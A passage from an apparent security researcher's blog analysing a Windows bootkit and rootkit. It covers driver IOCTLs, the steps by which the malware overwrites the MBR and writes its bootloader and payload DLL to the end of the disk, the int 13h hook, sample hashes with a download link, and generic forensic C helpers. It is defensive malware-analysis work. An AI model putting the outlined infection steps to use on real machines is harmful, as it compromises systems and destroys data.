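For reference, the generic 48-bit PIO setup sequence documented on OSDev can be expressed as a list of register writes. This sketch only computes the (port, value) pairs and performs no I/O; the port_write type and the ata_lba48_setup name are mine, and the rootkit's exact ordering may differ.

```c
#include <stddef.h>
#include <stdint.h>

#define ATA_CMD_READ_PIO_EXT  0x24  /* READ SECTORS EXT */
#define ATA_CMD_WRITE_PIO_EXT 0x34  /* WRITE SECTORS EXT */

typedef struct {
    uint16_t port;
    uint8_t  value;
} port_write;

/* Compute the register writes that program a 48-bit LBA transfer.
 * `base` is the command block base (0x1F0 or 0x170). The high bytes
 * of the sector count and LBA are written first, then the low bytes,
 * and the command byte goes last. Always returns 10. */
size_t ata_lba48_setup(uint16_t base, int slave, uint64_t lba,
                       uint16_t sectors, uint8_t cmd, port_write out[10])
{
    size_t n = 0;
    out[n++] = (port_write){ (uint16_t)(base + 6), (uint8_t)(0x40 | (slave ? 0x10 : 0x00)) };
    out[n++] = (port_write){ (uint16_t)(base + 2), (uint8_t)(sectors >> 8) };
    out[n++] = (port_write){ (uint16_t)(base + 3), (uint8_t)(lba >> 24) };  /* LBA byte 4 */
    out[n++] = (port_write){ (uint16_t)(base + 4), (uint8_t)(lba >> 32) };  /* LBA byte 5 */
    out[n++] = (port_write){ (uint16_t)(base + 5), (uint8_t)(lba >> 40) };  /* LBA byte 6 */
    out[n++] = (port_write){ (uint16_t)(base + 2), (uint8_t)sectors };
    out[n++] = (port_write){ (uint16_t)(base + 3), (uint8_t)lba };          /* LBA byte 1 */
    out[n++] = (port_write){ (uint16_t)(base + 4), (uint8_t)(lba >> 8) };   /* LBA byte 2 */
    out[n++] = (port_write){ (uint16_t)(base + 5), (uint8_t)(lba >> 16) };  /* LBA byte 3 */
    out[n++] = (port_write){ (uint16_t)(base + 7), cmd };
    return n;
}
```

After the command byte is issued, the caller polls the status register and then moves 256 words per sector through the data port at the command block base.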

To transfer the requested data the rootkit uses the aforementioned HAL functions READ_PORT_BUFFER_USHORT and WRITE_PORT_BUFFER_USHORT in a loop.

Summarizing the IOCTLs that the driver exposes.

IOCTL_ROOTKIT_KILL_PROCESS 0x222444 to kill the specified process, as input accepts a Process ID (PID).
IOCTL_ROOTKIT_INIT_DATA 0x222440 to initialize the rootkit structure containing undocumented offsets and functions, as input accepts initialized ROOTKIT_INIT_STRUCT (see below).
IOCTL_ROOTKIT_READ_WRITE_DISK 0x22243D to read/write disk data.
IOCTL_ROOTKIT_SEND_MBR_SIGNATURE to specify a disk to the rootkit for the following I/O operations.
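The numeric IOCTL values above follow the standard CTL_CODE layout (device type in bits 16..31, access in bits 14..15, function in bits 2..13, transfer method in bits 0..1), so they can be taken apart with a small helper. The ioctl_fields type and decode_ioctl name are hypothetical.

```c
#include <stdint.h>

/* Fields packed into a Windows I/O control code by CTL_CODE. */
typedef struct {
    uint16_t device_type;  /* bits 16..31 */
    uint8_t  access;       /* bits 14..15 */
    uint16_t function;     /* bits 2..13  */
    uint8_t  method;       /* bits 0..1: 0 = buffered, 1 = in direct,
                              2 = out direct, 3 = neither */
} ioctl_fields;

/* Split a 32-bit control code into its CTL_CODE components. */
ioctl_fields decode_ioctl(uint32_t code)
{
    ioctl_fields f;
    f.device_type = (uint16_t)(code >> 16);
    f.access      = (uint8_t)((code >> 14) & 0x3u);
    f.function    = (uint16_t)((code >> 2) & 0xFFFu);
    f.method      = (uint8_t)(code & 0x3u);
    return f;
}
```

Decoding 0x222440 gives device type 0x22 (FILE_DEVICE_UNKNOWN), function 0x910 and the buffered method, while 0x22243D gives function 0x90F with method 1 (METHOD_IN_DIRECT).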

Disk infection

Internally, the malware supports two mechanisms for accessing the disk in raw mode. It either calls CreateFile/ReadFile/WriteFile on PhysicalDrive0 when it needs to work with the Master Boot Record (MBR) or uses the rootkit driver to communicate with the disk at a low level.

As is the case with its other components, the malware stores the bootkit 16-bit bootloader in the dropper's resource section in encrypted form. The first 0x200 bytes of this data represent the malicious MBR and the rest is supposed to be written at the end of the disk.

The following picture shows the bootkit data structure on disk.

The malware infects the disk as follows:

Send the signature of the disk to be infected to the rootkit (IOCTL_ROOTKIT_SEND_MBR_SIGNATURE).
Read the first 16 sectors of the disk with IOCTL_ROOTKIT_READ_WRITE_DISK, or with CreateFile/ReadFile on \\.\PhysicalDrive0 if the rootkit driver failed to load. Frankly, I didn't get why the malware reads as many as 16 sectors, as it uses only the first one, which holds the MBR, to infect it.
Infect the MBR with the 16-bit bootloader code from resource 112.
Allocate a virtual memory region of 0x7E00 bytes (63 sectors) and copy the infected MBR, the original MBR, the 16-bit bootcode and the payload DLL into it.
Overwrite the original MBR with the infected one.
Calculate the offset from the end of the disk to drop the bootkit data (DiskSize - 0x41 sectors).
Write the bootkit data to the end of the disk.

This is the last step of system infection.
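For forensic extraction, the location of the bootkit data follows directly from the numbers above. Here is a small sketch with hypothetical names, assuming 512-byte sectors and that DiskSize is the total disk size in bytes.

```c
#include <stdint.h>

#define SECTOR_SIZE          512u
#define BOOTKIT_BUFFER_SIZE  0x7E00u  /* in-memory buffer: 63 sectors */
#define BOOTKIT_TAIL_SECTORS 0x41u    /* distance from the end of the disk */

/* Return the first LBA of the bootkit data area for a disk of the
 * given size, or 0 if the disk is too small to contain it. */
uint64_t bootkit_data_start_lba(uint64_t disk_size_bytes)
{
    uint64_t total_sectors = disk_size_bytes / SECTOR_SIZE;
    if (total_sectors <= BOOTKIT_TAIL_SECTORS)
        return 0;
    return total_sectors - BOOTKIT_TAIL_SECTORS;
}
```

On a 1 GiB disk image this points at sector 2097087, so dumping the 63 sectors (BOOTKIT_BUFFER_SIZE bytes) from there should recover the saved original MBR, the bootcode and the payload DLL.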

Bootloader

The malicious bootstrap code located in the MBR is responsible for loading the bootloader from the end of the disk. Due to the limitations of memory addressing in real mode, the bootstrap code first relocates itself from 0x7C00 to 0x600. The memory region starting at 0x7C00 is then used for loading the bootloader data. As was mentioned above, the infected MBR stores the start LBA of the bootkit extension and its size in sectors.

The malicious bootloader has its own powerful FAT and NTFS parsers. The NTFS parser is capable of performing RW operations on files and walking through the directory hierarchy. After reading the bootkit extension, it prepares a special array describing partitions of each connected disk supporting ATA/PATA interfaces. The following structure stores an item of that array.

After completing this, the code copies a partition item for the selected partition to the stack. The bootkit also keeps a structure describing the file that the malware is interested in.

Thus the bootloader internally supports two I/O types: file I/O and disk I/O. The appropriate functions work with the file context (file array) and the partition context (partition array). According to the code, the only file the bootkit is interested in is C:\WINDOWS\System32\sfc_os.dll, whose path is stored in encrypted form. The following NTFS structures are key to understanding its parser.

Understanding NTFS is a separate long story, so we'll limit ourselves to presenting these two structures. The code of this parser is quite large. It's capable of working with all the necessary resident and non-resident file attributes, including INDEX_ROOT and INDEX_ALLOCATION for recursive directory traversal.

Below you can see an example of an MFT record describing explorer.exe. The record has several standard file attributes, each of which has a header (ATTR_RECORD). A file attribute can be resident (it fits into the MFT record) or non-resident.

$STANDARD_INFORMATION (0x10) - contains the basic file information such as the date of creation and modification, attributes, owner and security IDs.
$FILE_NAME (0x30) - contains the file name, a reference to the file's directory and the file size.
$DATA (0x80) is responsible for storing file data.

The $DATA attribute stores all the information needed to locate the file data. But parsing the raw FS data to get the file content is more complicated in the case of a non-resident attribute. Instead of just reading the attribute body inside the MFT record, the parser needs to analyze a run list and convert VCNs to LCNs.

This is what part of the malicious bootloader's NTFS file read/write function looks like.
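The VCN-to-LCN conversion can be sketched in a few dozen lines. This is not the bootloader's code but a generic decoder of the NTFS mapping pairs format: each run starts with a header byte whose low nibble is the size of the length field and whose high nibble is the size of the signed offset field, with offsets relative to the previous run. The function name is hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

/* Translate a VCN to an LCN by walking an NTFS run list.
 * Returns 0 on success, -1 if the VCN is unmapped, falls into a
 * sparse run, or the run list is malformed. */
int runlist_vcn_to_lcn(const uint8_t *runs, size_t len,
                       uint64_t vcn, uint64_t *lcn_out)
{
    size_t   pos = 0;
    int64_t  lcn = 0;            /* running absolute LCN */
    uint64_t run_start_vcn = 0;

    while (pos < len && runs[pos] != 0) {
        unsigned len_size = runs[pos] & 0x0F;
        unsigned off_size = runs[pos] >> 4;
        pos++;
        if (len_size == 0 || len_size > 8 || off_size > 8 ||
            pos + len_size + off_size > len)
            return -1;

        /* Run length in clusters: unsigned little-endian. */
        uint64_t run_len = 0;
        for (unsigned i = 0; i < len_size; i++)
            run_len |= (uint64_t)runs[pos + i] << (8 * i);
        pos += len_size;

        /* Run offset: signed little-endian delta from the previous LCN. */
        if (off_size > 0) {
            uint64_t raw = 0;
            for (unsigned i = 0; i < off_size; i++)
                raw |= (uint64_t)runs[pos + i] << (8 * i);
            if (off_size < 8 && (runs[pos + off_size - 1] & 0x80))
                raw |= ~(uint64_t)0 << (8 * off_size);  /* sign-extend */
            lcn += (int64_t)raw;
            pos += off_size;
        }

        if (vcn < run_start_vcn + run_len) {
            if (off_size == 0)
                return -1;       /* sparse run: nothing stored on disk */
            *lcn_out = (uint64_t)lcn + (vcn - run_start_vcn);
            return 0;
        }
        run_start_vcn += run_len;
    }
    return -1;
}
```

For the run list 21 18 34 56 00, VCN 0 maps to LCN 0x5634 and the run covers 0x18 clusters; multiplying the LCN by the cluster size gives the byte offset within the volume.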

The code below represents a file system independent function that the bootloader uses to write a file.

Thus the bootkit works with FS as follows: creates a context for the targeted partition where the file is located, searches the file on this partition (volume) parsing the FS structures and creates a context for the found file.

The bootloader also intercepts int 13h in order to return the data of the original MBR if someone tries to read it.

After intercepting int 13h, the bootloader transfers control to the original bootstrap code, which it previously read from disk.

Unfortunately, while reversing the bootloader, I didn't manage to get a clear answer about how sfc_os.dll is patched, but according to its behavior and indirect evidence, it appears to overwrite the legitimate DLL with a bootkit payload one. One of the proofs is that after infection the payload DLL and sfc_os.dll are identical. Another one is that the payload DLL has sfc_os.dll stub exports, each of which returns the appropriate value of interest to the malware.

Key takeaways

The direct disk access feature is quite unique for malware - it's not clear what advantages it provides for the authors. The rootkit doesn't intercept the disk or disk port driver dispatch functions to hide its malicious sectors so any disk dumper tool can be used to detect these anomalies. One can only assume that the authors decided to rely on that comprehensive list of security products to be disabled rather than on hiding malicious activity in the live system.

Unlike its notorious counterparts such as Tdss (Tidserv) or Rovnix, this bootkit doesn't support its own disk partition and file system to store the malware modules. The original MBR and malware modules are simply written to the end of the disk without any additional preparations. This hints to us that the malware doesn't support a plugin architecture and its features are limited to the original ones implemented in the payload DLL.

MITRE ATT&CK matrix (clickable)

Unfolded version (clickable)

Big thanks to Gabriel Landau for his review and Matthew Hickey, Rong Hwa Chong, Tom Kallo for their feedback. Much appreciated.

Appendix

Used tools

Malware research: IDA Pro, Cerbero PE Insider, Disk Explorer for NTFS, WinDbg legacy, Hiew, VMware running Win7.

Editing pics: Paint, ZoomIt.

Diagrams: Word 365.

Necessary skills

Windows Internals, reverse engineering, malware analysis, forensics.

Fingerprints

First level dropper

e49ad00deda88a198f2728a3d276f0b55f892d3088bc861538a005e443d81a92

Main dropper

b32cf71e325ceaa8982e6ebed33f95894f2591397e08404368fbaa6dce1095e3

Payload DLL

eddbe87f2009cb3199def0845ccf01d0397c126aca6f55e2a9516616825cebb1

Driver (rootkit)

4fdc39276228cab7ef1ef26a084e920760fdaacd78b29e776f09da0a95ae39b0

Bootloader

8eb365237e4cfe478b228d276598ff58c0b133fbcd374024b5903137cf196a3d

For download:

https://www.kernelmode.info/forum/viewtopicf771-3.html?p=14683#p14683

Previous studies

https://zerosecurity.org/2013/06/guntior-bootkit-upgraded/

https://www.kernelmode.info/forum/viewtopicf168-2.html?f=16&t=1765

References

https://thestarman.pcministry.com/asm/mbr/NTFSBR.htm

https://thestarman.pcministry.com/asm/mbr/VistaVBR.htm

https://wiki.osdev.org/ATA_PIO_Mode

http://ntfs.com/ntfs-partition-boot-sector.htm

https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ata/ns-ata-_identify_device_data

https://wiki.osdev.org/ATA_Command_Matrix

https://github.com/microsoft/Windows-driver-samples/blob/main/storage/tools/spti/src/spti.c

https://learn.microsoft.com/en-us/previous-versions/windows/hardware/kernel/ff546644(v=vs.85)

https://wiki.osdev.org/PCI

https://forum.osdev.org/viewtopic.php?f=1&t=30125

https://codemachine.com/downloads/win71/wdm.h

https://reactos.org/forum/viewtopic.php?t=14520

https://systemroot.gitee.io/pages/apiexplorer/d5/d3/pci_8h-source.html

https://mybogi.files.wordpress.com/2011/08/interrupt-13h.pdf

https://en.wikipedia.org/wiki/DOS_memory_management

https://doxygen.reactos.org/d4/d45/drivers_2bus_2pcix_2enum_8c_source.html

↧

Windows Bootkits Guide

May 10, 2024, 2:11 am

The article has two main sections: an infographic and a list of web links to research, samples and sources. In the infographic, the Year column indicates the year the malware appeared or the information about it became public, and Infection refers to the disk entity being infected (Master Boot Record, UEFI, Volume Boot Record). It also gives the detection names used by three security vendors and the purpose of the payload.

✨eEye BootRoot

Bootkit Threat Evolution in 2011
https://www.welivesecurity.com/2012/01/03/bootkit-threat-evolution-in-2011-2/

↧

Windows Rootkits Guide

June 4, 2024, 12:27 am

Glad to present my deep dive into Windows rootkit families, from early concepts to the latest sophisticated instances. This is an attempt to summarize information about them and highlight the Windows Internals tricks they leverage to achieve their goals. The document includes a lot of links to information sources that cover the necessary Windows Internals knowledge and rootkit TTPs, so if u're not familiar with the topic, u can learn it from scratch. The link to the pdf is below.

https://artemonsecurity.com/windows_rootkits.pdf

↧

Windows Rootkits (and Bootkits) Guide v2

July 1, 2024, 1:24 pm

Hello folks and have a good day. If u follow my blog, u might know that my two previous blog posts discussed kernel-mode (km) malware - rootkits and bootkits - focusing on the Ring 0 tricks they employ and the timeline of their appearance. I'm excited to share version two of my research paper "Windows Rootkits Guide", now titled "Windows Rootkits and Bootkits Guide", which includes even more information than the first version. The biggest addition is a deep dive into bootkit families and the techniques they use (TTPs), alongside more details about rootkit techniques.

https://artemonsecurity.com/rootkits_bootkits_v2.pdf

The document is intended to be a comprehensive guide to Windows km malware, with some exceptions and remarks noted in it. Just like the first version, this guide includes direct references to the research from which the information was taken. It is structured as a reference book, which lets you navigate easily from a specific malware family to its rootkit TTPs (Windows kernel tricks).

The new document covers information about:

More than 70 rootkit techniques and km tricks
More than 90 rootkit and bootkit families
Almost 300 web links to malware research

The following techniques are included:

Intercepting system services with 6 sub-techniques
Direct Kernel Object Manipulation (DKOM) with 15 sub-techniques
Inline patching kernel mode code with 9 sub-techniques
Intercepting driver object major functions with 10 sub-techniques
Intercepting IDT/ISR
Setting up itself as a filter driver with 4 sub-techniques
Using Windows kernel callbacks
Using and hiding NTFS Alternate Data Streams (ADS)
Keylogger
Windows IP Filtering
Disabling Windows kernel callbacks
Bootkit infection with 4 sub-techniques
Defeating Driver Signature Enforcement (DSE) with 6 sub-techniques
14 other uncategorized sub-techniques, including disabling/bypassing PatchGuard

The following web resources made this document possible:

Malpedia | https://malpedia.caad.fkie.fraunhofer.de
MITRE ATT&CK® | https://attack.mitre.org/
KernelModeInfo forum | https://www.kernelmode.info/forum/
rootkit_com site mirror | https://github.com/claudiouzelac/rootkit.com/tree/master/
Virus Bulletin | https://www.virusbulletin.com/virusbulletin/

Also, the following studies are dedicated to the same purpose, i.e. summarizing information about Ring 0 malware:

An In-Depth Look at Windows Kernel Threats by Trend | https://documents.trendmicro.com/assets/white_papers/wp-an-in-depth-look-at-windows-kernel-threats.pdf
«Nice Boots!» - A Large-Scale Analysis of Bootkits and New Ways to Stop Them | https://publications.sba-research.org/publications/bootcamp_dimva_2015.pdf
Bootkit's development overview and trend | http://www.vxjump.net/files/seccon/bktrend.pdf
Bootkits: Past, Present & Future | https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-RodionovMatrosov.pdf
Positive Technologies | Bootkits: evolution and detection methods

The research details the following malware families.

↧

The final post

September 19, 2024, 2:41 pm

This blog is no longer active. For new posts, see:

https://aibaranov.github.io/

Contacts

https://linktr.ee/artem_i_baranov

https://github.com/ArtemBaranov/Misc

↧